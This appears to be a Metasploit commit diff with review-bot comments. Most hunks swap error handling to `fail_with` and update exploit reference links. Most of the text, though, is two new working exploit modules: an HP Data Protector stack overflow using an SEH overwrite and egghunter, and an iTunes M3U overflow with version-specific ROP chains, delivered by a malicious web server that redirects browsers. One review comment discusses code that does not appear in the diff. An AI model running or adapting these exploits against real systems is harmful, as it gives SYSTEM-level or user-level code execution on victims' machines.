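Review bot: The `break` after the new `fail_with(Exploit::Failure::Unreachable, "Could not access SAP service")` in the `rescue ::Rex::ConnectionError` branch can no longer run, because `fail_with` raises; the line should be dropped. This is also a behaviour change: the old code logged the error and left the loop, whereas a connection error now ends the module run. The unchanged `abort("Exploit not complete, check credentials")` at the top of the hunk is the one exit in this block that was not converted. Unless the module defines its own `abort`, that is `Kernel#abort` and would terminate the whole process, so `fail_with(Exploit::Failure::NoAccess, "Exploit not complete, check credentials")` looks right there too. The enclosing loop begins outside the hunk.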
diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb
index b4375c26e2..bb00538437 100644
--- a/modules/exploits/windows/http/savant_31_overflow.rb
+++ b/modules/exploits/windows/http/savant_31_overflow.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2002-1120' ],
[ 'OSVDB', '9829' ],
[ 'BID', '5686' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/787' ],
+ [ 'EDB', '787' ]
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb
index 1c213bdf4a..e21bfa14c8 100644
--- a/modules/exploits/windows/http/xitami_if_mod_since.rb
+++ b/modules/exploits/windows/http/xitami_if_mod_since.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '40594'],
[ 'OSVDB', '40595'],
[ 'BID', '25772' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/4450' ],
+ [ 'EDB', '4450' ]
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
index bb4b815721..a700b41e53 100644
--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
# try to detect the windows directory
@win_dir = detect_windows_dir()
if not @win_dir
- raise RuntimeError, "Unable to detect the target host windows directory (maybe not vulnerable)!"
+ fail_with(Exploit::Failure::NoTarget, "Unable to detect the target host windows directory (maybe not vulnerable)!")
end
end
print_status("Using windows directory \"#{@win_dir}\"")
diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb
index 9b875e9e6f..56bfec8eb0 100644
--- a/modules/exploits/windows/imap/eudora_list.rb
+++ b/modules/exploits/windows/imap/eudora_list.rb
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
if mytarget
print_status("Automatically detected \"#{mytarget.name}\" ...")
else
- raise RuntimeError, 'Unable to automatically detect a target'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to automatically detect a target')
end
else
mytarget = target
diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb
index 89709b6ceb..3999c24baf 100644
--- a/modules/exploits/windows/imap/mdaemon_fetch.rb
+++ b/modules/exploits/windows/imap/mdaemon_fetch.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-1358' ],
[ 'OSVDB', '43111' ],
[ 'BID', '28245' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/5248' ],
+ [ 'EDB', '5248' ]
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb
index f7ff09c881..8f7c40e291 100644
--- a/modules/exploits/windows/isapi/w3who_query.rb
+++ b/modules/exploits/windows/isapi/w3who_query.rb
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not mytarget
- raise RuntimeError, "No valid target found"
+ fail_with(Exploit::Failure::NoTarget, "No valid target found")
end
buf = rand_text_english(8192, payload_badchars)
diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb
index 517d696d2d..91a71e3077 100644
--- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb
+++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb
@@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Waiting for a payload session (backgrounding)...")
if not datastore['ExitOnSession'] and not job_id
- raise RuntimeError, "Setting ExitOnSession to false requires running as a job (exploit -j)"
+ fail_with(Exploit::Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
end
stime = Time.now.to_f
diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb
index e278020b99..45b3c6590d 100644
--- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb
+++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2007-6166' ],
[ 'OSVDB', '40876' ],
[ 'BID', '26549' ],
- [ 'URL', 'http://milw0rm.com/exploits/4648' ],
+ [ 'EDB', '4648' ],
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/misc/avidphoneticindexer.rb b/modules/exploits/windows/misc/avidphoneticindexer.rb
index 7fd8cc6449..47278ff1bd 100644
--- a/modules/exploits/windows/misc/avidphoneticindexer.rb
+++ b/modules/exploits/windows/misc/avidphoneticindexer.rb
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ ['CVE', '2011-5003'],
['OSVDB', '77376'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf' ],
],
diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb
index e08efdcde5..a5f443ea09 100644
--- a/modules/exploits/windows/misc/bopup_comm.rb
+++ b/modules/exploits/windows/misc/bopup_comm.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2009-2227' ],
[ 'OSVDB', '55275' ],
[ 'URL', 'http://www.blabsoft.com/products/server' ],
- [ 'URL', 'http://milw0rm.com/exploits/9002' ],
+ [ 'EDB', '9002' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb
new file mode 100644
index 0000000000..c147b5f62f
--- /dev/null
+++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb
@@ -0,0 +1,274 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Seh
+ include Msf::Exploit::Remote::Egghunter
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Data Protector Create New Folder Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in HP Data Protector 5. The overflow
+ occurs in the creation of new folders, where the name of the folder is handled in a
+ insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the
+ folder name is split in fragments in this insecure copy. Because of this, this module
+ uses egg hunting to search a non corrupted copy of the payload in the heap. On the other
+ hand the overflowed buffer is stored in a frame protected by stack cookies, because of
+ this SEH handler overwrite is used.
+
+ Any user of HP Data Protector Express is able to create new folders and trigger the
+ vulnerability. Moreover, in the default installation the 'Admin' user has an empty
+ password. Successful exploitation will lead to code execution with the privileges of
+ the "dpwinsdr.exe" (HP Data Protector Express Domain Server Service) process, which
+ runs as SYSTEM by default.
+ },
+ 'Author' =>
+ [
+ 'juan vazquez',
+ 'sinn3r'
+ ],
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ [ 'CVE', '2012-0124' ],
+ [ 'OSVDB', '80105' ],
+ [ 'BID', '52431' ],
+ [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03229235' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 2000,
+ 'BadChars' => "\x00\x2f\x5c",
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ ['HP Data Protector Express 5.0.00.59287 / Windows XP SP3',
+ {
+ 'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)
+ 'Offset' => 2730
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Mar 12 2012'
+ ))
+ register_options(
+ [
+ Opt::RPORT(3817),
+ OptString.new('USERNAME', [ true, 'The username to authenticate as','Admin' ]),
+ OptString.new('PASSWORD', [ false, 'The password for the specified username','' ])
+ ], self.class)
+ end
+
+ # dpwinsup!SvcEncrypt2
+ def encrypt_password(password)
+ if not password or password.empty?
+ return ""
+ end
+
+ result = ""
+ count = 0x80
+
+ i = 0
+ dl = 0
+ al = password.unpack("C*")[i]
+
+ while count > 2
+ al = al + dl
+ if al >= 0x100 then al = al - 0x100 end
+ al = al + 0x22
+ if al >= 0x100 then al = al - 0x100 end
+ al = al ^ 0x2b
+ if al >= 0x100 then al = al - 0x100 end
+ al = al + 0x4c
+ if al >= 0x100 then al = al - 0x100 end
+ al = al ^ 0x5f
+ if al >= 0x100 then al = al - 0x100 end
+ al = al - dl
+ if al >= 0x100 then al = al - 0x100 end
+ bl = al
+ if bl >= 0x100 then bl = bl - 0x100 end
+ bl = bl >> 4
+ if bl >= 0x100 then bl = bl - 0x100 end
+ bl = bl + 0x41
+ if bl >= 0x100 then bl = bl - 0x100 end
+ result << [bl].pack("C")
+ al = al & 0xf
+ if al >= 0x100 then al = al - 0x100 end
+ al = al + 0x41
+ if al >= 0x100 then al = al - 0x100 end
+ i = i + 1
+ result << [al].pack("C")
+ dl = dl + 5
+ if dl >= 0x100 then dl = dl - 0x100 end
+ count = count - 2
+ if i >= password.length
+ return result
+ end
+ al = password.unpack("C*")[i]
+
+ end
+ return result
+ end
+
+ def exploit
+ connect
+
+ machine_name = rand_text_alpha(15)
+
+ print_status("#{sock.peerinfo} - Sending Hello Request")
+
+ hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
+ hello << "\x3a\x53\xa5\x71\x06\x20\x80\x00" << "\x6a\x02\xaf\x03\xf8\xc5\xc7\x02"
+ hello << "\x01\x00\x00\x00\xc0\xa8\x01\x85" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ hello << "\x00\x00\x00\x00"
+ hello << machine_name << "\x00"
+ hello << "\x5b\x2e\xad\x71\x50\x03\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
+ hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xf8\x31\x0a\x10"
+ hello << "\x50\x03\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x6c\xfa"
+
+ sock.put(hello)
+ hello_response = sock.get
+
+ if not hello_response or hello_response.empty?
+ print_error("#{sock.peerinfo} - The Hello Request haven't had response")
+ return
+ end
+
+ print_status("#{sock.peerinfo} - Sending Authentication Request")
+
+ auth = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x18\x00\x00\x00\xa4\x01\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x01\x10\x00\x00" << "\xd1\x00\x97\x4e\xb8\xe7\x03\x00"
+ auth << "\xd5\x21\xe6\xff"
+
+ user = datastore['USERNAME']
+ pass = encrypt_password(datastore['PASSWORD'])
+ auth[20, user.length] = user
+ if pass and not pass.empty?
+ auth[276, pass.length] = pass
+ end
+
+ sock.put(auth)
+ auth_response = sock.get
+ if not auth_response or auth_response.empty?
+ print_error("#{sock.peerinfo} - The Authentication Request haven't had response")
+ return
+ end
+
+ print_status("#{sock.peerinfo} - Sending Token Request")
+ request_token = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x02\x00\x00\x00\x24\x00\x00\x00"
+ request_token << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ request_token << "\x07\x00\x00\x00"
+
+ sock.put(request_token)
+ response_token = sock.get
+ if not response_token or response_token.empty?
+ print_error("#{sock.peerinfo} - The Token Request haven't had response")
+ return
+ end
+
+ print_status("#{sock.peerinfo} - Sending Home Identifier Request")
+ request_home_identifier = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x03\x00\x00\x00\x30\x00\x00\x00"
+ request_home_identifier << "\x00\x00\x00\x00"
+ request_home_identifier << response_token[-8,8]
+ request_home_identifier << "\x02\x10\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x01\x00\xff\xff"
+ request_home_identifier << "\x00\x00\x00\x00"
+
+ sock.put(request_home_identifier)
+ response_home_identifier = sock.get
+ if not response_home_identifier or response_home_identifier.empty?
+ print_error("#{sock.peerinfo} - The Home Identifier Request haven't had response")
+ return
+ end
+
+ print_status("#{sock.peerinfo} - Sending Home Contents Request")
+ request_home_contents = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x04\x00\x00\x00\x3c\x00\x00\x00"
+ request_home_contents << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ request_home_contents << response_token[-8,8]
+ request_home_contents << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x02\x10\x00\x00"
+ request_home_contents << response_home_identifier[24,9] << "\00\x00\x00\x00\x0d\x00\x00"
+
+ sock.put(request_home_contents)
+ response_home_contents = sock.get
+ if not response_home_contents or response_home_contents.empty?
+ print_error("#{sock.peerinfo} - The Home Contents Request haven't had response")
+ return
+ end
+
+ hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :eggtag => 'w00t' })
+ my_payload = egg
+ my_payload << rand_text(target['Offset']-my_payload.length)
+ my_payload << generate_seh_record(target.ret)
+ my_payload << hunter
+
+ print_status("#{sock.peerinfo} - Sending Create Object Request")
+ create_object_request = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x06\x00\x00\x00\x39\x11\x00\x00"
+ create_object_request << "\x00\x00\x00\x00"
+ create_object_request << response_token[-8,8]
+ create_object_request << response_home_contents[20, 14] << "\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x20\x03\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00"
+ create_object_request << my_payload << "\x00"
+
+ create_object_request[12, 4] = [create_object_request.length].pack("V")
+
+ sock.put(create_object_request)
+
+ disconnect
+ end
+end
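Review bot: In `exploit`, each `sock.get` reply is checked only for nil/empty before fixed-offset slices are taken from it (`response_token[-8,8]`, `response_home_identifier[24,9]`, `response_home_contents[20, 14]`), so a short or error reply yields nil or a truncated slice and the following `<<` raises a TypeError instead of a readable failure. The authentication reply is never inspected either, so a rejected login only surfaces as a confusing failure in a later step. Each early `return` also skips `disconnect` and reports through `print_error`, while the rest of this commit moves failure paths to `fail_with`. A length check followed by `disconnect` and `fail_with(Exploit::Failure::Unknown, "Token Request reply too short")` would keep the reporting consistent.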
diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb
index 7d3947bb2d..acaa3e49b4 100644
--- a/modules/exploits/windows/misc/hp_omniinet_1.rb
+++ b/modules/exploits/windows/misc/hp_omniinet_1.rb
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
if not resp
- raise RuntimeError, "No version response returned."
+ fail_with(Exploit::Failure::Unknown, "No version response returned.")
end
resp = resp.unpack('v*').pack('C*')
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb
index 6c5dc2f0ff..406264f02f 100644
--- a/modules/exploits/windows/misc/hp_omniinet_2.rb
+++ b/modules/exploits/windows/misc/hp_omniinet_2.rb
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
if not resp
- raise RuntimeError, "No version response returned."
+ fail_with(Exploit::Failure::Unknown, "No version response returned.")
end
resp = resp.unpack('v*').pack('C*')
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
new file mode 100644
index 0000000000..b8e4444138
--- /dev/null
+++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
@@ -0,0 +1,283 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apple iTunes 10 Extended M3U Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.
+ When opening an extended .m3u file containing an "#EXTINF:" tag description,
+ iTunes will copy the content after "#EXTINF:" without appropriate checking
+ from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,
+ which allows code execution under the context of the user.
+
+ Please note before using this exploit, you must have precise knowledge of the
+ victim machine's QuickTime version (if installed), and then select your target
+ accordingly.
+
+ In addition, even though this exploit can be used as remote, you should be aware
+ the victim's browser behavior when opening an itms link. For example,
+ IE/Firefox/Opera by default will ask the user for permission before launching the
+ itms link by iTunes. Chrome will ask for permission, but also spits a warning.
+ Safari would be an ideal target, because it will open the link without any
+ user interaction.
+ },
+ 'Author' =>
+ [
+ 'Rh0 ', # discovery and metasploit module
+ 'sinn3r' #Mo' targets & code cleanup, etc
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => ['win'],
+ 'Arch' => ARCH_X86,
+ 'Payload' =>
+ {
+ 'Space' => 1000,
+ 'BadChars' => "\x00\x0a\x0d",
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404
+ },
+ 'References' =>
+ [
+ [ 'OSVDB', '83220' ],
+ [ 'EDB', '19322' ],
+ [ 'URL', 'http://pastehtml.com/view/c25uhk4ab.html' ]
+ ],
+ 'DisclosureDate' => "Jun 21 2012",
+ 'Targets' =>
+ [
+ # Default package for iTunesSetup104.exe
+ ['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3',
+ {
+ 'Ret' => 0x669C197B, # ADD ESP,0xD40 / ret [QuickTime.qts]
+ 'ROP_NOP' => 0x66801044 # RET
+ }
+ ],
+ # Default package for iTunesSetup1041.exe
+ [ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3',
+ {
+ 'Ret' => 0x6693A96B, # ADD ESP,0xD40 / ret [QuickTime.qts]
+ 'ROP_NOP' => 0x66801044 # RET
+ }
+ ],
+ [ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3',
+ {
+ 'Ret' => 0x6693ACBB, # ADD ESP,0xD40 / ret [QuickTime.qts]
+ 'ROP_NOP' => 0x66801044 # RET
+ }
+ ],
+ ['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3',
+ {
+ 'Ret' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts]
+ 'ROP_NOP' => 0x66801044 # RET
+ }
+ ]
+ ]
+ ))
+ end
+
+
+ def on_request_uri(cli,request)
+ # re-generate the payload
+ return if ((p = regenerate_payload(cli).encoded) == nil)
+
+ host = request.headers['HOST']
+ agent = request.headers['USER-AGENT']
+
+ # iTunes browser link
+ m3u_location = "itms://#{host}#{get_resource()}/#{rand_text_alphanumeric(8+rand(8))}.m3u"
+
+ if request.uri =~ /\.ico$/i
+ # Discard requests for ico files
+ send_not_found(cli)
+ elsif request.uri =~ /\.m3u$/i
+ print_status("Target: #{target.name}")
+ print_status("Sending playlist")
+ send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
+ elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
+ print_status("Redirecting to playlist")
+ send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
+ elsif agent =~ /NT 5\.1/
+ # redirect Firefox, Chrome, Opera, Safari to iTunes link
+ print_status("Redirecting to playlist")
+ send_redirect(cli, m3u_location)
+ else
+ print_status("Unknown User-Agent: #{agent}")
+ send_not_found(cli)
+ end
+ end
+
+
+ # IE did not proper redirect when retrieving an itms:// location redirect via a HTTP header...
+ # ... so use html
+ def generate_redirect_ie(m3u_location)
+ ie_redir = <<-HTML_REDIR
+
+
+
+
+
+
+ HTML_REDIR
+
+ ie_redir = ie_redir.gsub(/^\t\t\t/, '')
+
+ return ie_redir
+ end
+
+
+ def generate_m3u(payload)
+ # Bypass stack cookies by triggering a SEH exception before
+ # the cookie gets checked. SafeSEH is bypassed by using a non
+ # safeSEH DLL [QuickTime.qts].
+
+ # stack buffer overflow ->
+ # overwrite SEH handler ->
+ # trigger SEH exception ->
+ # rewind stack (ADD ESP, ...) and land in ROP NOP sled ->
+ # virtualprotect and execute shellcode
+
+ m3u = '#EXTINF:,'
+
+ # stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
+ # ... so ensure we overwrite a SEH handler to get back to our rop chain
+ m3u << [target.ret].pack("V") * 0x6a # stack pivot/rewind
+ m3u << [target['ROP_NOP']].pack("V") * 30 # ROP NOP sled
+ m3u << gimme_rop
+ m3u << payload
+
+ # 0x1000 should be enough to overflow the stack and trigger SEH
+ m3u << rand_text_alphanumeric(0x1000 - m3u.length)
+
+ return m3u
+
+ end
+
+
+ def gimme_rop
+ # thanx to mona.py :)
+ rop_chain = [
+ :popad,
+ # registers
+ 0x66801044, # EDI: RET
+ 0x7c801ad4, # ESI: VirtualProtect [kernel32.dll]
+ :jmpesp,
+ junk,
+ :ebx, # EBX: Becomes 0x3e8
+ 0xffffffd6, # EDX: Becomes 0x40
+ 0x673650b0, # ECX: lpflOldProtect
+ 0x90909090, #EAX
+ # correct dwSize and flNewProtect
+ :modebx,
+ :addedx,
+ # throw it on the stack
+ :pushad
+ ]
+
+ # Map gadgets to a specific Quicktime version
+ rop_chain.map! { |g|
+ case target.name
+ when /QuickTime 7\.69/
+ case g
+ when :popad then 0x66C3E260
+ when :jmpesp then 0x669F6E21
+ when :ebx then 0x4CC48017
+ when :modebx then 0x669A8648 # xor ebx,4CC483FF; ret
+ when :addedx then 0x669FC1C6 # add edx, 0x6a; ret
+ when :pushad then 0x6682A67E
+ else
+ g
+ end
+
+ when /QuickTime 7\.70/
+ case g
+ when :popad then 0x66926F5B
+ when :jmpesp then 0x66d6b743
+ when :ebx then 0x6c1703e8
+ when :modebx then 0x66b7d8cb # add ebx, 0x93E90000 ; ret
+ when :addedx then 0x66975556 # add edx, 0x6a; ret
+ when :pushad then 0x6689B829
+ else
+ g
+ end
+
+ when /QuickTime 7\.71/
+ case g
+ when :popad then 0x668E2BAA
+ when :jmpesp then 0x66965F78
+ when :ebx then 0x6c1703e8
+ when :modebx then 0x66B7DC4B # add ebx, 0x93E90000 ; ret
+ when :addedx then 0x66975956 # add edx, 0x6a; ret
+ when :pushad then 0x66C28B70
+ else
+ g
+ end
+
+ when /QuickTime 7\.72/
+ case g
+ when :popad then 0x66c9a6c0
+ when :jmpesp then 0x6697aa03
+ when :ebx then 0x6c1703e8
+ when :modebx then 0x66b7de1b # add ebx, 0x93E90000 ; ret
+ when :addedx then 0x66975c56 # add edx, 0x6a; ret
+ when :pushad then 0x6684b5c6
+ else
+ g
+ end
+ end
+ }
+
+ rop_chain.pack("V*")
+ end
+
+
+ def junk
+ rand_text_alpha(4).unpack("L")[0].to_i
+ end
+
+end
+
+=begin
+0:000> r
